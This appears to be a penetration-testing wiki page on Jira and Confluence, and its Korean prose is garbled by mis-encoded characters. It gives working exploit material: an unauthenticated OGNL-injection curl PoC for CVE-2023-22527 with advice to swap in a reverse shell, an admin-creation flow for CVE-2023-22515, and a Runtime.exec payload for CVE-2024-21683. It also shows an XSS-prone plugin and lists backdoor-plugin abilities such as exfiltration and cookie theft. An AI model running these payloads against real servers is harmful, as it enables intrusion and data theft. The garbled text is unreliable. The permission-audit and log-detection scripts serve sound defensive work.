# Jira & Confluence


๊ถŒํ•œ ํ™•์ธ

Jira์—์„œ๋Š” ์ธ์ฆ ์—ฌ๋ถ€์™€ ๊ด€๊ณ„์—†์ด ๋ชจ๋“  ์‚ฌ์šฉ์ž๊ฐ€ /rest/api/2/mypermissions ๋˜๋Š” /rest/api/3/mypermissions ์—”๋“œํฌ์ธํŠธ๋ฅผ ํ†ตํ•ด ๊ถŒํ•œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์—”๋“œํฌ์ธํŠธ๋“ค์€ ์‚ฌ์šฉ์ž๊ฐ€ ํ˜„์žฌ ๋ณด์œ ํ•œ ๊ถŒํ•œ์„ ๋…ธ์ถœํ•ฉ๋‹ˆ๋‹ค. ํŠนํžˆ ๋น„์ธ์ฆ ์‚ฌ์šฉ์ž์—๊ฒŒ ๊ถŒํ•œ์ด ๋ถ€์—ฌ๋œ ๊ฒฝ์šฐ๋Š” ๋ณด์•ˆ ์ทจ์•ฝ์ ์„ ์˜๋ฏธํ•˜๋ฉฐ, ์ด๋Š” bounty ๋Œ€์ƒ์ด ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ์ธ์ฆ ์‚ฌ์šฉ์ž์—๊ฒŒ ์˜ˆ์ƒ์น˜ ๋ชปํ•œ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ๋„ ์ทจ์•ฝ์ ์œผ๋กœ ๊ฐ„์ฃผ๋ฉ๋‹ˆ๋‹ค.

์ค‘์š”ํ•œ ์—…๋ฐ์ดํŠธ๊ฐ€ 2019๋…„ 2์›” 1์ผ์— ์ด๋ฃจ์–ด์ ธ, โ€˜mypermissionsโ€™ ์—”๋“œํฌ์ธํŠธ๊ฐ€ โ€˜permissionโ€™ ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํฌํ•จํ•˜๋„๋ก ์š”๊ตฌํ•˜๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด ์š”๊ตฌ์‚ฌํ•ญ์€ ์กฐํšŒํ•  ๊ถŒํ•œ์„ ์ง€์ •ํ•จ์œผ๋กœ์จ ๋ณด์•ˆ์„ ๊ฐ•ํ™”ํ•˜๋ ค๋Š” ๋ชฉ์ ์ž…๋‹ˆ๋‹ค: ์—ฌ๊ธฐ์—์„œ ํ™•์ธํ•˜์„ธ์š”

  • ADD_COMMENTS
  • ADMINISTER
  • ADMINISTER_PROJECTS
  • ASSIGNABLE_USER
  • ASSIGN_ISSUES
  • BROWSE_PROJECTS
  • BULK_CHANGE
  • CLOSE_ISSUES
  • CREATE_ATTACHMENTS
  • CREATE_ISSUES
  • CREATE_PROJECT
  • CREATE_SHARED_OBJECTS
  • DELETE_ALL_ATTACHMENTS
  • DELETE_ALL_COMMENTS
  • DELETE_ALL_WORKLOGS
  • DELETE_ISSUES
  • DELETE_OWN_ATTACHMENTS
  • DELETE_OWN_COMMENTS
  • DELETE_OWN_WORKLOGS
  • EDIT_ALL_COMMENTS
  • EDIT_ALL_WORKLOGS
  • EDIT_ISSUES
  • EDIT_OWN_COMMENTS
  • EDIT_OWN_WORKLOGS
  • LINK_ISSUES
  • MANAGE_GROUP_FILTER_SUBSCRIPTIONS
  • MANAGE_SPRINTS_PERMISSION
  • MANAGE_WATCHERS
  • MODIFY_REPORTER
  • MOVE_ISSUES
  • RESOLVE_ISSUES
  • SCHEDULE_ISSUES
  • SET_ISSUE_SECURITY
  • SYSTEM_ADMIN
  • TRANSITION_ISSUES
  • USER_PICKER
  • VIEW_AGGREGATED_DATA
  • VIEW_DEV_TOOLS
  • VIEW_READONLY_WORKFLOW
  • VIEW_VOTERS_AND_WATCHERS
  • WORK_ON_ISSUES

Example: https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS

```bash
# Check non-authenticated privileges (no credentials sent, so this is the anonymous user's view)
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
```
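An added audit script (not from the original page or from Atlassian) that queries the endpoint anonymously and reports which of the returned permissions are granted. The SENSITIVE baseline and the sample response are assumptions constructed for this example.

```python
import json
import urllib.request
from typing import Iterable

# Permissions an anonymous (unauthenticated) session should never hold.
# Assumed baseline for this example; adjust to the instance's intended access model.
SENSITIVE = frozenset({
    "ADMINISTER", "SYSTEM_ADMIN", "ADMINISTER_PROJECTS", "CREATE_PROJECT",
    "DELETE_ISSUES", "SET_ISSUE_SECURITY", "USER_PICKER", "VIEW_DEV_TOOLS",
})


def fetch_mypermissions(base_url: str, permissions: Iterable[str]) -> str:
    """GET /rest/api/2/mypermissions with no credentials, i.e. as the anonymous user.
    The permissions to query are passed explicitly, as required since Feb 2019."""
    url = f"{base_url.rstrip('/')}/rest/api/2/mypermissions?permissions={','.join(permissions)}"
    with urllib.request.urlopen(url, timeout=15) as resp:  # deliberately no auth header
        return resp.read().decode("utf-8")


def granted(body: str) -> list[str]:
    """Permission keys the response reports with "havePermission": true."""
    perms = json.loads(body).get("permissions", {})
    return sorted(k for k, v in perms.items() if v.get("havePermission") is True)


def anonymous_findings(body: str) -> list[str]:
    """Granted permissions that are in the sensitive set: each one is a finding."""
    return [k for k in granted(body) if k in SENSITIVE]


# Constructed sample in the shape of Jira's mypermissions JSON (values are made up).
SAMPLE = json.dumps({"permissions": {
    "BROWSE_PROJECTS": {"key": "BROWSE_PROJECTS", "havePermission": True},
    "CREATE_ISSUES": {"key": "CREATE_ISSUES", "havePermission": False},
    "ADMINISTER_PROJECTS": {"key": "ADMINISTER_PROJECTS", "havePermission": True},
}})

if __name__ == "__main__":
    # Against a live instance: body = fetch_mypermissions("https://jira.example.com", SENSITIVE)
    for key in anonymous_findings(SAMPLE):
        print(f"[!] anonymous session holds {key}")
```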

์ž๋™ํ™”๋œ ์—ด๊ฑฐ

## Recent RCEs and practical exploit notes (Confluence)

### CVE-2023-22527 – Unauthenticated template/OGNL injection (10.0)

  • Affects Confluence Data Center/Server 8.0.x–8.5.3 and 8.4.5. The vulnerable Velocity template text-inline.vm allows OGNL evaluation without authentication.
  • Quick PoC (the command runs as the confluence user):

```bash
curl -k -X POST "https://confluence.target.com/template/aui/text-inline.vm" \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))'
```

  • The x-cmd response header contains the command output. Replace id with a reverse shell payload.
  • Scanner: nuclei template http/cves/2023/CVE-2023-22527.yaml (included in nuclei-templates ≥9.7.5).

### CVE-2023-22515 – Admin creation via setup re-enablement (auth bypass)

  • On publicly reachable Confluence Data Center/Server 8.0.0–8.5.1, setupComplete can be toggled and /setup/setupadministrator.action re-run to create a new administrator account.
  • Minimal exploit flow:
  1. GET /server-info.action (unauthenticated) to confirm the endpoint is reachable.
  2. POST to /server-info.action with a buildNumber parameter to toggle the setup flag.
  3. POST to /setup/setupadministrator.action with fullName, email, username, password and confirm to create the administrator account.
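For the two unauthenticated CVEs above (CVE-2023-22527 and CVE-2023-22515), an added detection example that is not part of the original page: it scans web-server access-log lines for POSTs to the request paths named in those sections. The combined log format and the sample lines are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

# Request paths from the two Confluence CVEs above. A POST to any of them against an
# instance whose setup finished long ago is a strong signal; the .vm hit is near-certain.
SIGNATURES = {
    "CVE-2023-22527": {"/template/aui/text-inline.vm"},
    "CVE-2023-22515": {"/server-info.action", "/setup/setupadministrator.action"},
}

# Combined log format as written by a reverse proxy in front of Confluence (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass(frozen=True)
class Hit:
    cve: str
    ip: str
    ts: str
    path: str
    status: int


def scan(lines):
    """Return a Hit for every POST whose path (query string stripped) matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # GETs to these paths are normal traffic; only POSTs change state
        path = m["path"].split("?", 1)[0]
        for cve, paths in SIGNATURES.items():
            if path in paths:
                hits.append(Hit(cve, m["ip"], m["ts"], path, int(m["status"])))
    return hits


# Constructed sample lines (not from a real incident).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:09:12:01 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 512 "-" "curl/8.4.0"',
    '198.51.100.3 - - [10/Jan/2024:09:12:02 +0000] "GET /server-info.action HTTP/1.1" 200 1033 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [10/Jan/2024:09:12:03 +0000] "POST /server-info.action HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [10/Jan/2024:09:12:05 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - alice [10/Jan/2024:09:13:00 +0000] "POST /rest/api/content HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.ts} {h.ip} {h.cve} {h.path} -> {h.status}")
```

A GET to /server-info.action is not flagged on purpose, because that page is legitimately fetched by clients; correlate the POST hits with a newly created administrator account to confirm.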

### CVE-2024-21683 – Authenticated RCE via Code Macro upload

  • A Confluence admin can upload a crafted language definition under Configure Code Macro; the bundled Rhino engine executes the embedded Java, leading to RCE.
  • To obtain a shell, upload a .lang file containing a payload like the following:

```xml
<?xml version="1.0"?>
<languages>
<language key="pwn" name="pwn" namespace="java.lang">
<tokens>
<token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token>
</tokens>
</language>
</languages>
```

  • It triggers when the malicious language is selected in a Code Macro body. The Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683 automates auth + upload + exec.

## Atlassian plugins

As explained in this blog, the Plugin modules documentation lists the different plugin types that are available.

The following is an example of a macro plugin:

<details>

<summary>Macro plugin example</summary>

```java
package com.atlassian.tutorial.macro;

import com.atlassian.confluence.content.render.xhtml.ConversionContext;
import com.atlassian.confluence.macro.Macro;
import com.atlassian.confluence.macro.MacroExecutionException;

import java.util.Map;

public class helloworld implements Macro {

    public String execute(Map<String, String> map, String body, ConversionContext conversionContext) throws MacroExecutionException {
        // The "Name" macro parameter is user-controlled and is concatenated into the
        // returned HTML without escaping, which is what makes this macro XSS-prone.
        if (map.get("Name") != null) {
            return ("<h1>Hello " + map.get("Name") + "!</h1>");
        } else {
            return "<h1>Hello World!</h1>";
        }
    }

    public BodyType getBodyType() { return BodyType.NONE; }

    public OutputType getOutputType() { return OutputType.BLOCK; }
}
```

</details>

์ด ํ”Œ๋Ÿฌ๊ทธ์ธ๋“ค์ด XSS์™€ ๊ฐ™์€ ์ผ๋ฐ˜์ ์ธ ์›น ์ทจ์•ฝ์ ์— ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ์Œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด ์•ž์˜ ์˜ˆ์ œ๋Š” ์‚ฌ์šฉ์ž ์ž…๋ ฅ์„ ๋ฐ˜์˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์ทจ์•ฝํ•ฉ๋‹ˆ๋‹ค.

XSS๊ฐ€ ๋ฐœ๊ฒฌ๋˜๋ฉด [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence)์—์„œ XSS์˜ ์˜ํ–ฅ๋ ฅ์„ ๋†’์ด๊ธฐ ์œ„ํ•œ ๋ช‡ ๊ฐ€์ง€ payloads๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

## ๋ฐฑ๋„์–ด ํ”Œ๋Ÿฌ๊ทธ์ธ

[**This post**](https://cyllective.com/blog/posts/atlassian-malicious-plugin)์—์„œ๋Š” ์•…์„ฑ Jira ํ”Œ๋Ÿฌ๊ทธ์ธ์ด ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋‹ค์–‘ํ•œ(์•…์„ฑ) ๋™์ž‘๋“ค์„ ์„ค๋ช…ํ•ฉ๋‹ˆ๋‹ค. [**code example in this repo**](https://github.com/cyllective/malfluence)์—์„œ ์ฝ”๋“œ ์˜ˆ์ œ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋‹ค์Œ์€ ์•…์„ฑ ํ”Œ๋Ÿฌ๊ทธ์ธ์ด ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋ช‡ ๊ฐ€์ง€ ๋™์ž‘์ž…๋‹ˆ๋‹ค:

- **Hiding Plugins from Admins**: ์ผ๋ถ€ ํ”„๋ก ํŠธ์—”๋“œ javascript๋ฅผ ์ฃผ์ž…ํ•˜์—ฌ ์•…์„ฑ ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ๊ด€๋ฆฌ์ž์—๊ฒŒ์„œ ์ˆจ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Exfiltrating Attachments and Pages**: ๋ชจ๋“  ๋ฐ์ดํ„ฐ์— ์ ‘๊ทผํ•˜์—ฌ exfiltrateํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Stealing Session Tokens**: ์‘๋‹ต์—์„œ ํ—ค๋”๋ฅผ ๊ทธ๋Œ€๋กœ ๋ฐ˜ํ™˜ํ•˜๋Š” endpoint๋ฅผ ์ถ”๊ฐ€(์ฟ ํ‚ค ํฌํ•จ)ํ•˜๊ณ , ํ•ด๋‹น endpoint์— ์ ‘์†ํ•ด cookies๋ฅผ leakํ•˜๋Š” javascript๋ฅผ ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Command Execution**: ๋ฌผ๋ก  ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ๋งŒ๋“ค์–ด ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Reverse Shell**: ๋˜๋Š” reverse shell์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **DOM Proxying**: ๋งŒ์•ฝ confluence๊ฐ€ ํ”„๋ผ์ด๋น— ๋„คํŠธ์›Œํฌ ๋‚ด๋ถ€์— ์žˆ๋‹ค๋ฉด, ์ ‘๊ทผ ๊ถŒํ•œ์ด ์žˆ๋Š” ์‚ฌ์šฉ์ž์˜ ๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด ์—ฐ๊ฒฐ์„ ์ˆ˜๋ฆฝํ•˜๊ณ  ์˜ˆ๋ฅผ ๋“ค์–ด ๊ทธ ๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด ์„œ๋ฒ„์— ์ ‘์†ํ•˜์—ฌ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

## References

- [Atlassian advisory – CVE-2023-22527 template injection RCE](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-datacenter-and-confluence-server-1333990257.html)
- [CISA AA23-289A – Active exploitation of Confluence CVE-2023-22515](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a)